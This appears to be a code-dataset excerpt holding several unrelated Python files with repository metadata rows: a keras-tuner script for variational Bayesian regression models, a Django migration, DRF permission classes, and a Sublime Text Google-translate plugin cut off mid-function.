    NOTE(review): ``AnnealingDenseVariational`` is not defined or imported
    anywhere visible in this file -- presumably it comes from
    ``data_utils`` (imported with *); verify, otherwise calling this
    raises NameError.
    """
    return AnnealingDenseVariational(
        units,
        make_posterior_fn=_posterior_mean_field,
        make_prior_fn=make_prior_fn_for_empirical_bayes,
        activation=activation,
        kl_weight=initial_kl_weight)
def eb_dense_layer(units, activation, eb_prior_fn, divergence_fn):
    """Build a reparameterized variational dense layer with an
    empirical-Bayes prior and the given KL divergence function."""
    return tfp.layers.DenseReparameterization(
        units,
        activation=activation,
        kernel_prior_fn=eb_prior_fn,
        # Posterior means initialized with He normal to match ReLU trunks.
        kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
            loc_initializer=keras.initializers.he_normal()),
        kernel_divergence_fn=divergence_fn)
def predict_N_times(model, test_set, y_norm, num_predictions=200):
    """Draw repeated stochastic predictions, de-normalize each with
    *y_norm*, and stack them along axis 1 (one column per draw)."""
    draws = []
    for _ in range(num_predictions):
        draws.append(y_norm.inverse_transform(model.predict(test_set)))
    return np.squeeze(np.stack(draws, axis=1))
def compute_quantiles(predictions):
    """Return the 2.5% and 97.5% quantiles of each row (95% interval)."""
    interval_bounds = [0.025, 0.975]
    return np.quantile(predictions, interval_bounds, axis=1)
def compute_coverage(predictions, y_norm, y_test):
    """Return a boolean array marking which de-normalized targets fall
    strictly inside the 95% predictive interval of *predictions*."""
    targets = y_norm.inverse_transform(y_test)
    lower, upper = compute_quantiles(predictions)
    covered = []
    for i in range(len(targets)):
        covered.append(lower[i] < targets[i] and upper[i] > targets[i])
    return np.array(covered)
def _build_svi_eb_model(hp):
    '''
    Build a stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior

    Every hidden layer is variational (DenseReparameterization) and the
    head is a heteroscedastic Gaussian (channel 0 = mean, channel 1 = raw
    scale, softplus-transformed).

    Parameters:
        hp (kerastuner.HyperParameters): a hyperparameter object that defines input dimension and the
        number of training examples
    Returns:
        model (keras.Model): a compiled keras model
    '''
    # KL divergence scaled by the number of batches per epoch.
    div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
    eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
    dropout_rate = hp.Float('dropout', min_value=0, max_value=.5, default=0.1)
    # training=None: dropout follows the call-time training flag.
    dropout_normal = lambda x: keras.layers.Dropout(dropout_rate)(x, training=None)
    inputs = keras.layers.Input((hp.get('input_dimension'),))
    width = hp.Int('width', min_value = 16, max_value = 64, step=16)
    for i in range(hp.Int('depth', min_value=1, max_value=3)):
        if i==0:
            net = tfp.layers.DenseReparameterization(
                width,
                activation='relu',
                kernel_prior_fn=eb_fn,
                kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
                    loc_initializer=keras.initializers.he_normal()),
                kernel_divergence_fn=div_fn)(inputs)
        else:
            net = dropout_normal(net)
            net = tfp.layers.DenseReparameterization(
                width,
                activation='relu',
                kernel_prior_fn=eb_fn,
                kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
                    loc_initializer=keras.initializers.he_normal()),
                kernel_divergence_fn=div_fn)(net)
    net = dropout_normal(net)
    net = keras.layers.Dense(
        2,
        activation='linear')(net)
    prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
                                                                    scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
    model = keras.Model(inputs=inputs, outputs=prediction)
    model.compile(
        keras.optimizers.Adam(learning_rate=hp.Float('learning_rate', min_value=10e-4, max_value=10e-1, sampling='log')),
        loss=negative_log_likelihood,
        metrics=['mse'],
    )
    return model
def _build_ll_svi_eb_model(hp):
    '''
    Build a last layer stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior

    Only the last hidden layer is variational; the trunk is made of
    deterministic Dense layers.

    Parameters:
        hp (kerastuner.HyperParameters): a hyperparameter object that defines input dimension and the
        number of training examples
    Returns:
        model (keras.Model): a compiled keras model
    '''
    # KL divergence scaled by the number of batches per epoch.
    div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
    eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
    dropout_rate = hp.Float('dropout', min_value=0, max_value=.5, default=0.1)
    dropout_normal = lambda x: keras.layers.Dropout(dropout_rate)(x, training=None)
    inputs = keras.layers.Input((hp.get('input_dimension'),))
    width = hp.Int('width', min_value = 16, max_value = 64, step=16)
    depth = hp.Int('depth', min_value=2, max_value=3)
    # Deterministic trunk: depth-1 plain Dense layers.
    for i in range(depth-1):
        if i==0:
            net = keras.layers.Dense(
                width,
                activation='relu')(inputs)
        else:
            net = dropout_normal(net)
            net = keras.layers.Dense(
                width,
                activation='relu')(net)
    net = dropout_normal(net)
    # Single variational ("last") layer.
    net = tfp.layers.DenseReparameterization(
        width,
        activation='relu',
        kernel_prior_fn=eb_fn,
        kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
            loc_initializer=keras.initializers.he_normal()),
        kernel_divergence_fn=div_fn)(net)
    net = dropout_normal(net)
    net = keras.layers.Dense(
        2,
        activation='linear')(net)
    # Heteroscedastic Gaussian head: channel 0 = mean, channel 1 = scale.
    prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
                                                                    scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
    model = keras.Model(inputs=inputs, outputs=prediction)
    model.compile(
        keras.optimizers.Adam(learning_rate=hp.Float('learning_rate', min_value=10e-4, max_value=10e-1, sampling='log')),
        loss=negative_log_likelihood,
        metrics=['mse'],
    )
    return model
def _build_svi_eb_model_tuner(tuner):
    '''
    Build a stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior

    Rebuilds the fully-variational architecture of _build_svi_eb_model,
    but with all hyperparameters fixed to the tuner's best trial.

    Parameters:
        tuner (EpochRandomTuner): a kerastuner object that has the best hyperparameters
    Returns:
        model (keras.Model): a compiled keras model
    '''
    hp = tuner.get_best_hyperparameters()[0]
    # KL divergence scaled by the number of batches per epoch.
    div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
    eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
    dropout_normal = lambda x: keras.layers.Dropout(hp.get('dropout'))(x, training=None)
    inputs = keras.layers.Input((hp.get('input_dimension'),))
    for i in range(hp.get('depth')):
        if i==0:
            net = tfp.layers.DenseReparameterization(
                hp.get('width'),
                activation='relu',
                kernel_prior_fn=eb_fn,
                kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
                    loc_initializer=keras.initializers.he_normal()),
                kernel_divergence_fn=div_fn)(inputs)
        else:
            net = dropout_normal(net)
            net = tfp.layers.DenseReparameterization(
                hp.get('width'),
                activation='relu',
                kernel_prior_fn=eb_fn,
                kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
                    loc_initializer=keras.initializers.he_normal()),
                kernel_divergence_fn=div_fn)(net)
    net = dropout_normal(net)
    net = keras.layers.Dense(
        2,
        activation='linear')(net)
    prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
                                                                    scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
    model = keras.Model(inputs=inputs, outputs=prediction)
    model.compile(
        keras.optimizers.Adam(learning_rate=hp.get('learning_rate')),
        loss=negative_log_likelihood,
        metrics=['mse'],
    )
    return model
def _build_ll_svi_eb_model_tuner(tuner):
    '''
    Build a last layer stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior

    Rebuilds the last-layer-variational architecture of
    _build_ll_svi_eb_model with all hyperparameters fixed to the tuner's
    best trial.

    Parameters:
        tuner (EpochRandomTuner): a kerastuner object that has the best hyperparameters
    Returns:
        model (keras.Model): a compiled keras model
    '''
    hp = tuner.get_best_hyperparameters()[0]
    # KL divergence scaled by the number of batches per epoch.
    div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
    eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
    dropout_normal = lambda x: keras.layers.Dropout(hp.get('dropout'))(x, training=None)
    inputs = keras.layers.Input((hp.get('input_dimension'),))
    # Deterministic trunk: depth-1 plain Dense layers.
    for i in range(hp.get('depth')-1):
        if i==0:
            net = keras.layers.Dense(
                hp.get('width'),
                activation='relu')(inputs)
        else:
            net = dropout_normal(net)
            net = keras.layers.Dense(
                hp.get('width'),
                activation='relu')(net)
    net = dropout_normal(net)
    # Single variational ("last") layer.
    net = tfp.layers.DenseReparameterization(
        hp.get('width'),
        activation='relu',
        kernel_prior_fn=eb_fn,
        kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
            loc_initializer=keras.initializers.he_normal()),
        kernel_divergence_fn=div_fn)(net)
    net = dropout_normal(net)
    net = keras.layers.Dense(
        2,
        activation='linear')(net)
    # Heteroscedastic Gaussian head: channel 0 = mean, channel 1 = scale.
    prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
                                                                    scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
    model = keras.Model(inputs=inputs, outputs=prediction)
    model.compile(
        # Bug fix: the original referenced the undefined name `hp_dict`
        # here, raising NameError whenever this builder ran.
        keras.optimizers.Adam(learning_rate=hp.get('learning_rate')),
        loss=negative_log_likelihood,
        metrics=['mse'],
    )
    return model
def _build_model(architecture):
    '''
    Select a model building function
    Parameters:
        architecture (str): a string which indicates with model builder function to return
    Returns:
        function: a model builder function
    '''
    builders = {
        "svi": _build_svi_eb_model,
        "ll_svi": _build_ll_svi_eb_model,
    }
    return builders[architecture]
def _build_model_from_tuner(architecture):
    '''
    Select a model building function
    Parameters:
        architecture (str): a string which indicates with model builder function to return
    Returns:
        function: a model builder function
    '''
    builders = {
        "svi": _build_svi_eb_model_tuner,
        "ll_svi": _build_ll_svi_eb_model_tuner,
    }
    return builders[architecture]
def _get_best_tuner(dataset, method, split):
    '''
    Select the best tuner on a dataset and split and method
    Parameters:
        dataset (str): which dataset to train on, one of ['bostonHousing', 'concerete', 'energy', 'kin8nm',
        'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht']
        method (str): which model to train, one of ['svi', 'll_svi']
        split (int): which data-fold to use. range [0,19] for all datasets except proteins, then [0,4] inclusive.
    Returns:
        tuner (EpochRandomTuner): a tuner with best hyperparameters
    '''
    # NOTE(review): 'concerete' looks like a typo for 'concrete' but
    # presumably matches the on-disk dataset directory name -- verify.
    X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(dataset, split)
    X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
    hp = kt.HyperParameters()
    hp.Fixed('input_dimension', X_train[0].shape[0])
    hp.Fixed('num_train_examples', X_train.shape[0])
    # Re-create the tuner with the same settings as the search, then
    # reload its saved state from disk instead of re-searching.
    tuner = EpochRandomTuner(_build_model(method),
                             objective = 'val_mse',
                             hyperparameters = hp,
                             max_trials = 100,
                             seed = 42,
                             directory = 'regression_HP_SVI',
                             project_name = f"{dataset}/{method}/{split}")
    tuner.reload()
    return tuner
def _build_and_train_from_tuner(dataset, method, split, tuner):
    '''
    Select a model and train it on a dataset and split
    Parameters:
        dataset (str): which dataset to train on, one of ['bostonHousing', 'concerete', 'energy', 'kin8nm',
        'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht']
        method (str): which model to train, one of ['svi', 'll_svi']
        split (int): which data-fold to use. range [0,19] for all datasets except proteins, then [0,4] inclusive.
    Returns:
        model (keras.Model): a trained model from the best hyperparameters
    '''
    X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(dataset, split)
    X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
    # Final fit uses train + validation combined (hyperparameters are
    # already chosen, so the validation fold is no longer held out).
    X_train_val = np.concatenate((X_train, X_validation))
    y_train_val = np.concatenate((y_train, y_validation))
    model = _build_model_from_tuner(method)(tuner)
    print(model.summary())
    tensorboard_cb = keras.callbacks.TensorBoard(log_dir=f'/logs/tensorboard/{dataset}/{method}/{split}/')
    model.fit(x=X_train_val, y=y_train_val, batch_size=32, callbacks=[tensorboard_cb], epochs=1000)
    return model
class EpochRandomTuner(kt.tuners.RandomSearch):
    """RandomSearch tuner that pins the training batch size to 32 for
    every trial."""
    def run_trial(self, trial, *args, **kwargs):
        # You can add additional HyperParameters for preprocessing and custom training loops
        # via overriding `run_trial`
        kwargs['batch_size'] = 32
        #kwargs['epochs'] = 300
        super(EpochRandomTuner, self).run_trial(trial, *args, **kwargs)
def main():
    """Run the random hyperparameter search for one dataset/method pair
    over all of its cross-validation splits.

    Results are written under /data/regression_HP_SVI and TensorBoard
    logs under /logs/tensorboard; splits with an existing result
    directory are skipped so the job can be resumed.
    """
    parser = argparse.ArgumentParser("Find HPs for SVI and LL-SVI")
    parser.add_argument("--dataset", type=str, help="Dataset to train on", choices=['bostonHousing', 'concerete', 'energy', 'kin8nm',
                                                                                    'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht'])
    parser.add_argument("--method", default="", choices=['svi', 'll_svi'],
                        type=str, help="Method to train with (svi or ll_svi")
    args = parser.parse_args()
    """# Find Hyperparameters"""
    for _DATASET in [args.dataset]:
        for _METHOD in [args.method]:
            # Proteins ships 5 folds; every other dataset ships 20.
            for _SPLIT in range(20 if _DATASET !='protein-tertiary-structure' else 5):
                # Reseed per split for reproducibility.
                np.random.seed(0)
                tf.random.set_seed(0)
                print(f"{_DATASET}/{_METHOD}/{_SPLIT}")
                # Skip splits that already have tuner output on disk.
                if os.path.isdir(f"/data/regression_HP_SVI/{_DATASET}/{_METHOD}/{_SPLIT}"):
                    continue
                print(f"{_DATASET}/{_METHOD}/{_SPLIT}")
                X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(_DATASET, _SPLIT)
                X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
                hp = kt.HyperParameters()
                hp.Fixed('input_dimension', X_train[0].shape[0])
                hp.Fixed('num_train_examples', X_train.shape[0])
                hp.Fixed('std_prior_scale', 1.5)
                hp.Fixed('init_prior_scale_mean', -1)
                hp.Fixed('init_prior_scale_std', .1)
                hp.Fixed('batch_size', 32)
                tensorboard_cb = keras.callbacks.TensorBoard(log_dir=f'/logs/tensorboard/{_DATASET}/{_METHOD}/{_SPLIT}')
                tuner = EpochRandomTuner(_build_model(_METHOD),
                                         objective = 'val_mse',
                                         hyperparameters = hp,
                                         max_trials = 50,
                                         seed = 42,
                                         directory = '/data/regression_HP_SVI',
                                         project_name = f"{_DATASET}/{_METHOD}/{_SPLIT}")
                # Full SVI needs longer training per trial than last-layer SVI.
                tuner.search(X_train, y_train, validation_data = (X_validation, y_validation), epochs=1000 if _METHOD=='svi' else 200, callbacks=[tensorboard_cb], verbose=0)
# Script entry point.
if __name__ == "__main__":
    main()
| 41.773756 | 180 | 0.676776 |
8b21c4ffc2dc6bd6647b070b7a3b015b6daa7ca8 | 819 | py | Python | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | 4 | 2019-12-06T06:19:33.000Z | 2021-12-23T13:05:06.000Z | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | 8 | 2020-03-15T03:40:38.000Z | 2022-03-12T00:50:27.000Z | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.5 on 2019-09-16 07:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: retargets two ForeignKey fields with
    explicit related_names (verbose_name '归属应用' means 'owning
    application')."""
    dependencies = [
        ('designs', '0003_auto_20190916_1130'),
    ]
    operations = [
        migrations.AlterField(
            model_name='interfacegroup',
            name='application',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_group_application', to='applications.Application', verbose_name='归属应用'),
        ),
        migrations.AlterField(
            model_name='interfacetest',
            name='interface',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_test_interface', to='designs.Interfaces'),
        ),
    ]
| 32.76 | 177 | 0.67033 |
2cbe97e4fda922c539bb6ef2b3fa6ca4a191e4f1 | 1,235 | py | Python | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from allauth.account.models import EmailAddress
from django.conf import settings
from rest_framework.permissions import SAFE_METHODS, BasePermission
class ReadOnly(BasePermission):
    """Grant access only to safe (read-only) HTTP methods."""

    def has_permission(self, request, view):
        # GET/HEAD/OPTIONS are DRF's "safe" methods.
        is_read_request = request.method in SAFE_METHODS
        return is_read_request
class ReadOrAuthCreateOnly(BasePermission):
    """Reads for everyone; writes only for authenticated users (who must
    also have a verified e-mail when DRF_ACCOUNT_EMAIL_VERIFICATION is
    enabled). Object-level access stays read-only."""

    def has_permission(self, request, view):
        if request.method in SAFE_METHODS:
            return True
        user = request.user
        if not (user and user.is_authenticated):
            return False
        if getattr(settings, "DRF_ACCOUNT_EMAIL_VERIFICATION", False):
            return EmailAddress.objects.filter(user=user, verified=True).exists()
        return True

    def has_object_permission(self, request, view, obj):
        return request.method in SAFE_METHODS
class AuthOnly(BasePermission):
    """Allow only authenticated users (email-verified when
    DRF_ACCOUNT_EMAIL_VERIFICATION is enabled)."""

    def has_permission(self, request, view):
        user = request.user
        if not (user and user.is_authenticated):
            return False
        if getattr(settings, "DRF_ACCOUNT_EMAIL_VERIFICATION", False):
            return EmailAddress.objects.filter(user=user, verified=True).exists()
        return True
da062bc67e8acb564dd2337db4c98f25545875d2 | 29,638 | py | Python | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding:utf-8
# https://github.com/zeusintuivo/SublimeText3-GoogleT
__version__ = "1.0.0"
import sublime
try:
# Python 3 assumption
from urllib.request import urlopen, build_opener, Request
from urllib.parse import urlencode, quote, unquote
except ImportError:
# Python 2 assumption
from urllib import urlopen, urlencode, quote, unquote
from json import loads
import re
import json
import random
from pprint import pprint
if sublime.version() < '3':
from urllib2 import urlopen, build_opener, Request
from handler_st2 import *
from socks_st2 import *
else:
from .handler_st3 import *
from .socks_st3 import *
class GoogletTranslateException(Exception):
    """
    Default GoogletTranslate exception.

    Raised with one of the messages from GoogletTranslate.error_codes
    (missing target language, proxy misconfiguration, service errors).
    """
    pass
class GoogletTranslate(object):
    # Regex fragment matching one JSON-style double-quoted string.
    string_pattern = r"\"(([^\"\\]|\\.)*)\""
    # Matches a ["translated","original"] pair in Google's response.
    match_string = re.compile(
        r"\,?\["
        + string_pattern + r"\,"
        + string_pattern
        + r"\]")
    # Error messages keyed by an HTTP-status-like code; raised via
    # GoogletTranslateException.
    error_codes = {
        401: "ERR_TARGET_LANGUAGE_NOT_SPECIFIED",
        501: "ERR_SERVICE_NOT_AVAILABLE_TRY_AGAIN_OR_USE_PROXY",
        503: "ERR_VALUE_ERROR",
        504: "ERR_PROXY_NOT_SPECIFIED",
    }
def __init__(self, proxy_enable, proxy_type, proxy_host, proxy_port, source_lang, target_lang):
self.cache = {
'languages': None,
}
self.api_urls = {
'translate': 'https://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=t',
}
if not source_lang:
source_lang = 'auto'
if not target_lang:
target_lang = 'en'
raise GoogletTranslateException(self.error_codes[401])
if proxy_enable == 'yes':
if not proxy_type or not proxy_host or not proxy_port:
raise GoogletTranslateException(self.error_codes[504])
self.source = source_lang
self.target = target_lang
self.proxyok = proxy_enable
self.proxytp = proxy_type
self.proxyho = proxy_host
self.proxypo = proxy_port
    @property
    def languages(self, cache=True):
        """Return the supported-language table, parsing and memoizing the
        embedded JSON on first access.

        NOTE(review): a property getter cannot receive the extra `cache`
        argument, so it always takes its default True -- confirm this
        parameter is vestigial.
        """
        try:
            if not self.cache['languages'] and cache:
                self.cache['languages'] = loads('{"languages":{"af":"Afrikaans","sq":"Albanian","ar":"Arabic",'
                                                '"az":"Azerbaijani","eu":"Basque","bn":"Bengali","be":"Belorussian",'
                                                '"bg":"Bulgarian","ca":"Catalan","zh-CN":"Chinese Simplified",'
                                                '"zh-TW":"Chinese Traditional","hr":"Croatian","cs":"Czech",'
                                                '"da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto",'
                                                '"et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French",'
                                                '"gl":"Galician","ka":"Georgian","de":"German","el":"Greek",'
                                                '"gu":"Gujarati","ht":"Haitian Creole","iw":"Hebrew",'
                                                '"hi":"Hindi","hu":"Hungarian","is":"Icelandic",'
                                                '"id":"Indonesian","ga":"Irish","it":"Italian",'
                                                '"ja":"Japanese","kn":"Kannada","ko":"Korean",'
                                                '"la":"Latin","lv":"Latvian","lt":"Lithuanian","mk":"Macedonian",'
                                                '"ms":"Malay","mt":"Maltese","no":"Norwegian","fa":"Persian",'
                                                '"pl":"Polish","pt":"Portuguese","ro":"Romanian","ru":"Russian",'
                                                '"sr":"Serbian","sk":"Slovak","sl":"Slovenian","es":"Spanish",'
                                                '"sw":"Swahili","sv":"Swedish","ta":"Tamil","te":"Telugu",'
                                                '"th":"Thai","tr":"Turkish","uk":"Ukrainian","ur":"Urdu",'
                                                '"vi":"Vietnamese","cy":"Welsh","yi":"Yiddish"}}')
        except IOError:
            raise GoogletTranslateException(self.error_codes[501])
        except ValueError:
            raise GoogletTranslateException(self.error_codes[503])
        return self.cache['languages']
    def translate(self, text, target_language, source_language, formato='html'):
        """Translate *text*, dispatching on the requested format.

        'plain' strips HTML tags from the result; 'yml' translates only
        the value part of `key: value` lines while preserving keys,
        quotes, HTML, %{}/#{} interpolations and escaped newlines; any
        other format translates the raw text.
        """
        original = unquote(quote(text, ''))
        print('original:', original)
        # if "'" in original:
        #     original = original.replace("'", '"')
        print('orig quo:', original)
        if formato == 'plain':
            data = self._get_translation_from_google(original)
            data = self.filter_tags(data)
        elif formato == 'yml':
            # Long texts are split per sentence to stay under Google's limit.
            if len(original) > 256:
                print('1')
                data = self.fix_too_long_text(original)
            else:
                print('2')
                if self.is_it_just_a_key(original):
                    if original == source_language + ':':  # change fr: to es:
                        data = target_language + ':'
                    else:
                        data = original
                else:
                    if self.starts_with_key(original):
                        # Preserve the YAML key, translate only the value.
                        saved_key = self.obtain_key(original)
                        translate_this = self.obtain_second_part(original)
                        if "\\n" in translate_this:
                            print('a3c')
                            data = saved_key + ': ' + self.fix_enters_keep(translate_this, "\\n")
                        elif "\n" in translate_this:
                            print('a3c')
                            data = saved_key + ': ' + self.fix_enters_keep(translate_this, "\n")
                        elif "'" in translate_this:
                            print('a3a')
                            data = saved_key + ': ' + self.fix_singlequote_keep(translate_this)
                        elif '"' in translate_this:
                            print('a3b')
                            data = saved_key + ': ' + self.fix_doublequote_keep(translate_this)
                        elif '<' in translate_this:
                            print('a3d')
                            data = saved_key + ': ' + self.fix_html_keep(translate_this)
                        elif '%{' in original:
                            print('a4')
                            data = saved_key + ': ' + self.fix_variable_keep(translate_this)
                        elif '#{' in original:
                            print('a4b')
                            data = saved_key + ': ' + self.fix_hashruby_keep(translate_this)
                        else:
                            print('a5')
                            data = saved_key + ': ' + self._get_translation_from_google(translate_this)
                    else:
                        data = self.original_work_distribute(original)
            data = self.fix_yml(original, data, target_language, source_language)
        else:
            data = self._get_translation_from_google(text)
            data = self.fix_google(data)
        return data
    def original_work_distribute(self, original):
        """Route *original* to the translation helper that preserves its
        special markup (escaped newlines, quotes, HTML tags, %{} or #{}
        interpolations), falling back to a plain Google translation."""
        if "\\n" in original:
            print('c3c', original)
            return self.fix_enters_keep(original, "\\n")
        elif "\n" in original:
            print('c3c', original)
            return self.fix_enters_keep(original, "\n")
        elif "'" in original:
            print('c3a')
            return self.fix_singlequote_keep(original)
        elif '"' in original:
            print('c3b')
            return self.fix_doublequote_keep(original)
        elif '<' in original:
            print('c3d')
            return self.fix_html_keep(original)
        elif '%{' in original:
            print('c4')
            return self.fix_variable_keep(original)
        elif '#{' in original:
            print('c4b')
            return self.fix_hashruby_keep(original)
        else:
            print('c5')
            return self._get_translation_from_google(original)
@staticmethod
def starts_with_key(original):
print(20)
original_no_spaces = original.lstrip()
original_no_spaces_all = original_no_spaces.rstrip()
print(21)
original_key_is = original_no_spaces.split(':')
print(22)
key_has_spaces = original_key_is[0].split(' ')
print(23)
second_part_exists = ""
if len(original_key_is) > 1:
second_part_exists = original_key_is[1].lstrip().rstrip()
if ':' in original and ':' in original and len(original_key_is) >= 2 and len(key_has_spaces) == 1:
if len(second_part_exists) > 0:
print('has hey and second part has content:(' + second_part_exists + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return True
return False
@staticmethod
def obtain_key(original):
print(30)
first_source_colon = original.find(':')
keep_source_definition = original[:first_source_colon]
print('has hey called:(' + keep_source_definition + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return keep_source_definition
@staticmethod
def obtain_second_part(original):
print(40)
first_source_colon = original.find(':')
second_part = original[(first_source_colon+1):]
print('has second part:(' + second_part + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return second_part.lstrip().rstrip()
@staticmethod
def is_it_just_a_key(original):
print(10)
original_no_spaces = original.lstrip()
original_no_spaces_all = original_no_spaces.rstrip()
if original_no_spaces_all in (None, "'", '"', '', '<br/>', '</i>', '<strong>', '</strong>', '<i>', '<br>',
'</br>', '</ br>', '<br >', '<br />'):
# skip empty br's
return True
print(11)
original_key_is = original_no_spaces.split(':')
print(12)
key_has_spaces = original_key_is[0].split(' ')
print(13)
second_part_exists = ""
if len(original_key_is) > 1:
second_part_exists = original_key_is[1].lstrip().rstrip()
if ':' in original and len(original_key_is) >= 2 and len(key_has_spaces) == 1:
if second_part_exists in (None, '', '>', '|', '|-'):
print('row has a yml key:(' + original + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return True
return False
def fix_too_long_text(self, original):
    """Translate *original*, splitting texts longer than 256 chars on
    '.' and translating each sentence separately (keeps requests short).
    """
    sentence_data = original
    if len(original) > 256:
        sentence_data = ""
        split_sentences = original.split('.')
        for sentence in split_sentences:
            # NOTE(review): the markers are looked up in *original*, not in
            # the current *sentence* -- one HTML/placeholder marker anywhere
            # switches the handling for every sentence. Also the '.'
            # separators are not restored after the split. Confirm intended.
            if '<' in original:
                print('23')
                sentence_data = sentence_data + self.fix_html_keep(sentence)
            elif '%{' in original:
                print('24')
                sentence_data = sentence_data + self.fix_variable_keep(sentence)
            else:
                sentence_data = sentence_data + self._get_translation_from_google(sentence)
    return sentence_data
def fix_variable_keep(self, sentence):
    """Translate *sentence* while keeping Rails-style ``%{name}``
    interpolation placeholders untouched.

    The text is split on ``'%{'``; placeholder names (up to the matching
    ``'}'``) are copied through verbatim and only the surrounding plain
    text is sent to Google.
    """
    sentence_data = ""
    split_percent = sentence.split('%{')
    splitted_trans = ""
    count_split = 0
    for splitted in split_percent:
        if splitted in (None, ''):
            # Empty chunk: the source had a leading or doubled '%{'
            # (e.g. "%{x}..." splits to ['', 'x}...']); re-emit the marker.
            splitted_trans = splitted_trans + ' %{'
        else:
            if '}' in splitted:
                # Chunk starts with the placeholder name, e.g.
                # 'time_ago} some text' -> copy name, translate the tail.
                cut_other_part = splitted.split('}')
                # NOTE(review): only cut_other_part[1] is translated; any
                # text after a second literal '}' in the chunk is dropped.
                second_part_split = cut_other_part[1]
                if second_part_split in (None, ''):
                    splited_data = ''
                else:
                    splited_data = self._get_translation_from_google(second_part_split)
                if count_split == 0:
                    # First chunk precedes any '%{': no marker to re-emit.
                    splitted_trans = splitted_trans + cut_other_part[0] + '} ' + splited_data
                else:
                    splitted_trans = splitted_trans + ' %{' + cut_other_part[0] + '} ' + splited_data
            else:
                # No closing brace: plain text, translate wholesale.
                print('go 1')
                splited_data = self._get_translation_from_google(splitted)
                splitted_trans = splitted_trans + splited_data
        count_split = count_split + 1
    if count_split == 0:
        # Unreachable in practice: str.split always yields >= 1 element.
